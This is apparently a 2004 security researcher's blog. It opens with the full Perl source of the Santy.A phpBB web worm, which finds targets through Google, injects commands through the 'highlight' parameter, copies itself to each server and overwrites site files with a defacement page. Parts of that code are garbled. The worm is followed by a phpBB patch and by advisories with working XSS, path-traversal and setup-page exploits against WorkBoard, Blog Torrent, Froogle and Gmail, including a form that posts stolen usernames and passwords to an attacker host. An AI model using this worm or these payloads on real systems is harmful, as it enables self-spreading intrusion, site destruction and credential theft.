Santy.A Web Worm Source Code (PoC) and pach

Wednesday, December 22, 2004


if you are afected... how to pach your web here:


Open viewtopic.php in any text editor. Find the following section of code:
Code:

//
// Was a highlight request part of the URI?
//
$highlight_match = $highlight = '';
if (isset($HTTP_GET_VARS['highlight']))
{
   // Split words and phrases
   $words = explode(' ', trim(htmlspecialchars(urldecode($HTTP_GET_VARS['highlight']))));
   for($i = 0; $i < sizeof($words); $i++)
   {


and replace with:
Code:

//
// Was a highlight request part of the URI?
//
$highlight_match = $highlight = '';
if (isset($HTTP_GET_VARS['highlight']))
{
   // Split words and phrases
   $words = explode(' ', trim(htmlspecialchars($HTTP_GET_VARS['highlight'])));
   for($i = 0; $i < sizeof($words); $i++)
   {


Please inform as many people as possible about this issue. If you're a hosting provider
please inform your customers if possible. Else we advise you implement some level of
additional security if you run ensim or have PHP running cgi under suexec, etc.

http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513

######################################################
# Santy.A - phpBB <= 2.0.10 Web Worm Source Code (PoC)
# Date : 22/12/2004
# Solution : Upgrade to phpBB version 2.0.11
#
# Santy.A - phpBB <= 2.0.10 Web Worm Source Code (Proof of Concept)
# ~~ For educational purpose ~~
# See : http://isc.sans.org/diary.php?date=2004-12-21
# http://www.k-otik.com/news/20041221.phpbbworm.php
# http://www.f-secure.com/v-descs/santy_a.shtml
#
#######################################################
!/usr/bin/perl
use
strict;
use Socket;

sub PayLoad();
sub DoDir($);
sub DoFile ($);
sub GoGoogle();
sub GrabURL($);
sub str2chr($);

eval{ fork and exit; };
my $generation = x;
PayLoad() if $generation > 3;
open IN, $0 or exit;
my $self = join '', <IN>;
close IN;
unlink $0;
while(!GrabURL('http://www.google.com/advanced_search')) {
if($generation > 3)
{
PayLoad() ;
} else {
exit;
}
}
$self =~ s/my \$generation = (\d+);/'my $generation = ' . ($1 + 1) . ';'/e;
my $selfFileName = 'm1ho2of';
my $markStr = 'HYv9po4z3jjHWanN';
my $perlOpen = 'perl -e "open OUT,q(>' . $selfFileName . ') and print
q(' . $markStr . ')"';
my $tryCode = '&highlight=%2527%252Esystem(' . str2chr($perlOpen) . ')%252e%2527';
while(1) {
exit if -e 'stop.it';
OUTER: for my $url (GoGoogle()) {
exit if -e 'stop.it';
$url =~ s/&highlight=.*$//;
$url .= $tryCode;
my $r = GrabURL($url);
next unless defined $r;
next unless $r =~ /$markStr/;
while($self =~ /(.{1,20})/gs) {
my $portion = '&highlight=%2527%252Efwrite(fopen(' . str2chr($selfFileName)
. ',' . str2chr('a') . '),
' . str2chr($1) . '),exit%252e%2527';
$url =~ s/&highlight=.*$//;
$url .= $portion;
next OUTER unless GrabURL($url);
}
my $syst = '&highlight=%2527%252Esystem(' . str2chr('perl ' . $selfFileName)
. ')%252e%2527';
$url =~ s/&highlight=.*$//;
$url .= $syst;

GrabURL($url);
}
}
sub str2chr($) {
my $s = shift;
$s =~ s/(.)/'chr(' . or d($1) . ')%252e'/seg;
$s =~ s/%252e$//;
return $s;
}
sub GoGoogle() {
my @urls;
my @ts = qw/t p topic/;
my $startURL = 'http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all'
. '&
q=allinurl%3A+%22viewtopic.php%22+%22' . $ts[int(rand(@ts))] . '%3D' . int(rand(30000))
.
'%22&btnG=Search';
my $goo1st = GrabURL($startURL)
fined $goo1st;
my $allGoo = $goo1st;
my $r = '<td><a href=(/search\?q=.+?)' . '><img src=/nav_page\.gif
width=16 height=26
alt="" border=0><br>\d+</a>';
while($goo1st =~ m#$r#g) {
$allGoo . = GrabURL('www.google.com' . $1);
}
while($allGoo =~ m#href=(http://\S+viewtopic.php\S+)#g) {
my $u = $1;
next if $u =~ m#http://.*http://#i; # no redirects
push(@urls, $u);
}
return @urls;
}
sub GrabURL($) {
my $url = shift;
$url =~ s#^http://##i;
my ($host, $res) = $url =~ m#^(.+?)(/.*)#;
return unless defined($host) && defined($res);
my $r =
"GET $resHTTP/1.0\015\012" .
"Host: $host\015\012" .
"Accept:*/*\015\012" .
"Accept-Language: en-us,en-gb;q=0.7,en;q=0.3\015\012" .
"Pragma: no-cache\015\012" .
"Cache-Control: no-cache\015\012" .
"Referer: http://" . $host . $res . "\015\012" .
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\015\012"
.
"Connection: close\015\012\015\012";
my $port = 80;
if($host =~ /(.*):(\d+)$/){ $host = $1; $port = $2;}
my $internet_addr = inet_aton($host) or return;
socket(Server, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or return;
setsockopt(Server, SOL_SOCKET, SO_RCVTIMEO, 10000);
connect(Server, sockaddr_in($port, $internet_addr)) or return;
select((select(Server), $| = 1)[0]);
print Server $r;
my $answer = join '', <Server>;
close (Server);
return $answer;
}
sub DoFile($) {
my $s = q{
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD><TITLE>This site is defaced!!!</TITLE></HEAD>
<BODY bgcolor="#000000" text="#FF0000">
<H1>This site is defaced!!!</H1>
<HR><ADDRESS><b>NeverEverNoSanity WebWorm generation }
. $generation .q{.</b></ADDRESS>
</BODY></HTML>
};
unlink $_[0];
open OUT, ">$_[0]" or return;
print OUT $s;
close OUT;
}
sub DoDir($) {
my $dir = $_[0];
$dir .= '/' unless $dir =~ m#/$#;
local *DIR;
opendir DIR, $dir or return;
for my $ent (grep { $_ ne '.' and $_ ne '..' } readdir DIR) {
unless(-l $dir . $ent) {
if(-d _) {
DoDir($dir . $ent);
next;
}
}
if($ent =~ /\.htm/i or $ent =~ /\.php/i or $ent =~ /\.asp/i or $ent =~ /\.shtm/i
or $ent =~ /\.jsp/i
or $ent =~ /\.phtm/i) {
DoFile($dir . $ent);
}
}
closedir DIR;
}
sub Pay Load() {
my @dirs;
eval{
while(my @a = getpwent()) { push(@dirs, $a[7]);}
};
push(@dirs, '/ ');
for my $l ('A' .. 'Z') {
push(@d
for my $d (@dirs) {
DoDir($d);
}
}



Workboard input validation error in task_id variable and proyect_id variable

Friday, December 17, 2004

#########################################
Work board input validation error in
task_id variable and proyect_id variable
let´s remote users to make XSS attacks
vendor: http://www.burnwave.com/modules.php? name=
Archives&op=info&did=15

Developer: Michael Squires
vendor notified: yes(msn conversation) xploit include: yes
original advisore:http://lostmon.blogspot.com/2004/12
/workboard-input-validation-error-in.html
OSVDB ID:12504
secunia:SA13574
##########################################


WorkBoard is a project/task manager used for primarily for software development
(in this case, PHP... but it can be used for non-software projects).
this script have two imput validation erros and a remote user can conduct
Cross-site scripting attacks (XSS)

the flaw was on 'project_id' variable


http://[target]/modules.php?name=WorkBoard&file=
project&project_id=3[XSS_code]

http://[target]/modules.php?name=WorkBoard&file=project&project_id=
2%3Cbody%3E%3Cp%3E%3Ch1%3EWorkboard+XSS%20Pow@!!+%21%21%21+
lostmon+was+here+%3AD%3C/h1%3E

and the same flaw afected 'task_id' variable


http://[target]/modules.php?name=Work_Board&op=
Task&task_id=7[XSS_code]
http://[target]/modules.php?name=Work_Board&op=
Task&task_id=5%3Cbody%3E%3Cp%3E%3Ch1%3EWorkboard+
XSS%20Pow@!!+%21%21%21+lostmon+was+here+%3AD%3C/h1%3E

i`m speaking whith the developer by msn conversation....
but he is no interesed to fix it ????
:///

atentamente

Lostmon (lostmon@gmail.com)


thnx to estrella to be my ligth

thnx to all who belibed in me




--

La curiosidad es lo que hace mover la mente.



=============================================

conversation whith the developer by MSN


==================================================

No interest to fix ??? :O


X---//...Lostmon...Bug on Froogle php script ---> http://lostmon.blogspot.com
...\\----X dice:
hello !
Burnwave Ltd || Oh no! I forgot my voicemail passcode. Thanks IBM Help! dice:

Yes?

X---//...Lostmon...Bug on Froogle php script ---> http://lostmon.blogspot.com
...\\----X dice:

helo you are the developer of

X---//...Lostmon...Bug on Froogle php script ---> http://lostmon.blogspot.com
...\\----X dice:

workboard ?

Burnwave Ltd || Oh no! I forgot my voicemail passcode. Thanks IBM Help! dice:

yes, I am.

X---//...Lostmon...Bug on Froogle php script ---> http://lostmon.blogspot.com
...\\----X dice:

okis i have found 2 poible faws

X---//...Lostmon...Bug on Froogle php script ---> http://lostmon.blogspot.com
...\\----X dice:

in your work

X---//...Lostmon...Bug on Froogle php script ---> http://lostmon.blogspot.com
...\\----X dice:

in 2 variables

Burnwave Ltd || Oh no! I forgot my voicemail passcode. Thanks IBM Help! dice:

unfortunately I do NOT support my free scripts

Burnwave Ltd || Oh no! I forgot my voicemail passcode. Thanks IBM Help! dice:

thanks for reading

Burnwave Ltd || Oh no! I forgot my voicemail passcode. Thanks IBM Help! dice:

if you want an updated version of workboard, go to nukescripts.net.

Burnwave Ltd || Oh no! I forgot my voicemail passcode. Thanks IBM Help! dice:

thanks

X---//...Lostmon...Bug on Froogle php script ---> http://lostmon.blogspot.com
...\\----X dice:

no like toi see ?



No se pudo entregar el mensaje siguiente a todos los destinatarios:

no like toi see ?





--
la curiosidad es lo que hace mover la mente

POSIBLE FIX

for variable proyect_id

search: $project_id = intval($project_id);


change for:

case "Project":

$project_id = intval($project_id);

$pagetitle = ": "._MODULE_PROJECT_TITLE."$project_id";


for variable task_id

search: $task_id = intval($task_id);


change for:

case "task":

$task_id = intval($task_id);

$pagetitle = ": "._MODULE_PROJECT_TITLE."$task_id";


Bug found : Lostmon (lostmon@gmail.com)

FIX by Lmc , by suko http://spanishwebmaster.com


Atentamente
Lostmon (lostmon@gmail.com)
thnx to Suko & Lmc

Disclosure on Froogle php script and setup.php unauthorice access

Tuesday, December 14, 2004

############################################
disclosure on Froogle php script by http://www.68designs.com/
target: froogle script version 1.0
vendor url: http://www.68designs.com/kb/link.php?id=5
impact: disclosure of instalation path .unauthoriced access
Xploit include: yes vendor informed :yes
OSVDB ID:12481
Secunia:SA13504
Securitytracker:1012553
############################################

Froogle script is a php web base script for adding in a ecomerce suit or store
and manage easy the Froogle´s account or offert products from Froogle.

In a defaults instalations this script need for install a file caled 'setup.php'
(no authentication is needed for run the script) any user can call
this file and reinstall the aplication in certs cases or obtain
administrative access to the aplication.
proof of concept :

http://[target]/froogle_path/setup.php
http://[target]/froogle/setup.php?option=step1
http://[target]/froogle/setup.php?option=step2

atentamente:
Lostmon (lostmon@gmail.com)

Thnx to estrella to be my ligth
Thnx to all who believed in me

Securitytracker url: http://securitytracker.com/alerts/2004/Dec/1012553.html

--
La curiosidad es lo que hace mover la mente....

variable 'file' in Blog Torrent 'btdownload.php' imput validation error(cross-site scripting)

Tuesday, December 07, 2004
####################################
variable 'file' in Blog Torrent 'btdownload.php'
imput validation error(cross-site scripting)
vendor : www.blogtorrent.com/
http://sourceforge.net/tracker/index.php?func=detail&aid=1080615&group_id=109524&atid=654202
Preview Version 0.8
vendor notified: yes exploit included:yes
impact:execute javascriptcode,remote file inclusion.
remote command execution.
OSVDB ID:12250 , 12251
Securitytracker:1012452
####################################



Blogs torrent is a web php script for managing
torrent links and users fron the blog and other options...

Variable 'file' in Blog Torrent 'btdownload.php'have and input
validation error and permits insert javascripts and execute code
and remote file inclusion, remote command execution Vulnerability

froof of concept :

get cookie session:

http://[target]/bittorrent_module/btdownload.php?
file=<script>alert(document.cookie)</script>



http://[target]/bittorrent_module/btdownload.php?
file=<script>document.write(document.cookie)</script>



insert content :


http://[target]/bittorrent_module/btdownload.php?

file=<img%20src=http://www.google.es/images/logo_sm.gif>


insert remote web :


http://[target]/bittorrent_module/btdownload.php?
file=<iframe%20src=http://www.google.es/></iframe>


insert remote data base:

http://[target]/bittorrent_module/btdownload.php?
file=<form%20action="http://www.atacker.com/savedb.php"%
20method="post">Username:<input%20name="username"%20type=
"text"%20maxlength="30">Password:<input%20name="password"
%20type="text"%20maxlength="30"><input%20name="login"%20
type="submit"%20value="Login"></form>



in sabedb.php i have query strings to save variables password

and username

sabedb.php obtain the cookie

<?

$archivo = 'tostada.txt';

$fp = fopen($archivo, "a");

$string = "$cookie";

$write = fputs($fp, $string);

fclose($fp);

?>

and save it into a txt

and save the user and password


<?php

mysql_db_query("passwordssss","insert into $usuario (usuario,pass)

values ('$usuario','$password')";

?>


whith this values what user put and sabe in a lite data base contains

only 2 tables password & username :)



disclosure username and password hash



http://[target]/torrent_blog/btdownload.php?file=<iframe%20src=../data/users></iframe>

or

http://[target]/torrent_blog/btdownload.php?file=<iframe%20src=http://[target]/torrent_blog/data/users></iframe>


download arbitraies files of the server or blog :



http://[target]/torrent_blog/btdownload.php?type=torrent&file=[path%file]

http://[target]/torrent_blog/btdownload.php?type=torrent&file=../password.php

http://[target]/torrent_blog/btdownload.php?type=torrent&file=../settings.php

http://[target]/torrent_blog/btdownload.php?type=torrent&file=../login.php




securitytracker url: http://www.securitytracker.com/alerts/2004/Dec/1012452.html

atentamente

Lostmon (lostmon@gmail.com)


thnx to estrella to be my ligth

thnx to all who believed in me
--
La curiosidad es lo que hace mover la mente...

zx issue repair form Gmail can bypass by equal simbol "="

Sunday, December 05, 2004
hello !!

After look this "bug"(http://securitytracker.com/alerts/2004/Nov/1012289.html)
and i look what are you making for correct this issue, and i happy this bug is solved
http://gmail.google.com/gmail?search=cat&cat=inbox&view=tl&start=0&zx=
18acabd2b173f0d81040559556%3Cscript%3Ealert(document.cookie)%3C%2
Fscript%3E&fs=1

but this issue can repeat only ned a '=' symbol in url after 'zx' variablelike this:

Again Denial of service :/
http://gmail.google.com/gmail?search=cat&cat=inbox&view=tl&start=0&zx=
18acabd2b173f0d81040559556[just here inser the simbol]%3Cscript%3Ealert
(document.cookie)%3C%2Fscript%3E&fs=1

http://gmail.google.com/gmail?search=cat&amp;cat=inbox&view=tl&start=0&zx=
18acabd2b173f0d81040559556=%3Cscript%3Ealert(document.cookie)%3C
%2Fscript%3E&fs=1

and the bucle is repeating :-)

atentamente:
Lostmon (Lostmon@gmail.com)

thnx to estrella to be my ligth
thnx to all who believed in me
--
La curiosidad es lo que hace mover la mente....

Denial of service On gmail account

Si un usuario tiene activa su cookie de Gmail podria
ser vulnenable a este tipo de atake ,en el cual podriamos
llegar hasta denegar el sevicio.


#######################################

Denial of service On gmail account

vendor url: http://gmail.google.com/

vendor notified:yes exploit included :yes

original advisore:http://lostmon.spymac.net/blog/

########################################




si un usuario tiene activa su cookie de ge mail podria ser

vulnenable a este tipo de atake ,en el cual podriamos llegar

hasta denegar el sevicio.



Asi un usuario mal intencionado podria crear una url mal intencionada y...

1- modificar o digamos engaƱar al usuario con una etiketa inexsitente:

http://gmail.google.com/gmail?search=cat&cat=[label_name]
&view=tl&start=0&zx=

como vemos el boton "remove label" nos muestra el titulo incluido en
[label_name] el cual puede no existir

2-Cross-site scripting:

la variable Zx no comprueba ni la longitud intrudicida ni si lo

introducido es correcto permintiendonos incluir codigo script para ser ejecutado.



http://gmail.google.com/gmail?search=cat&cat=etiketa&view=tl&start=0&zx=
8acabd2b173f0d81040559556[XSS-code]&fs=1

3- probocando una denegacion del servicio :)

al permitir la variable zx ejecusion de codigo cualkier codigo ke usemos hara que la variable fs se repita y repita y repita como resultado se obtendra una denegacion de servicio ya que el usuario no podra ver la pagina de gmail al estar "actualizando" cada vez :


http://gmail.google.com/gmail?search=cat&amp;amp;amp;amp;amp;amp;cat=etiketa&
view=tl&start=0&zx=18acabd2b173f0d81040559556%3Cscript%3Ealert
(document.cookie)%3C%2Fscript%3E&fs=1



atentamente

Lostmon (lostmon@gmail.com)

thnx to http://www.ayuda-internet.net for their support

Thnx to Rottew and ismax

Thx to estrella to be my ligth



La curiosidad es lo que hace mover la mente....


Gmail remote information disclosure



hello:


after found a bug in gmail ,i variable 'zx' few time ago i say gmail

reveal contact list to remote users,discloses account name,and gain

acces to account if cookie if active and whith some url can list

contacts labels or other information for sending to atacker´s web
site:

a situation o a proff of concept :


1 send a mail to gmail´s account information is the same...(not

spamming please :D)


2- in this email you send in html format and you can make two actions:


2.1 including code in html of this email (mail.html)

2.2 send a link and wait for users click on ...


if the gmails cookie if active and the user click on,any user can view

this information and can use it or send to ther sites via web form

others


Sample of Mail.html


<html>

<head>

<title>Gmail disclosure informatio Xploit</title>

<meta http-equiv="Content-Type" content="text/html;
charset=iso-8859-1">

</head>

<body>

<table width="80%" border="0" align="center">

<tr>

<td><h5> <strong><font face="verdana">contact
list of gmail</font></strong>

<iframe height="100%" id="iframe" width="100%"

frameborder="0"

src="http://gmail.google.com/gmail?view=page&name=contacts&amp;ver="

></iframe>

</h5></td>

</tr>

<tr>

<td height="21"> <h5><strong>user&acute;s
name

account</strong><script>document.write(document.cookie)</script>

<iframe height="100%" id="iframe" width="100%"

frameborder="0" src="http://gmail.google.com/gmail?view=ca&file=2&zx="

></iframe>

</h5></td>

</tr>

<tr>

<td height="48"> <h5> user account options

<iframe height="100%" id="iframe" width="100%"

frameborder="0"

src="https://www.google.com/accounts/CheckCookie?chtml=LoginDoneHtml"></iframe>

</h5></td>

</tr>

<tr>

<td height="48"><script>document.write(document.cookie)</script> </td>

</tr>

</table>

</body>

</html>


atentamente:

Lostmon (Lostmon@gmail.com)


--

La curiosidad es lo que hace mover la mente....

 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...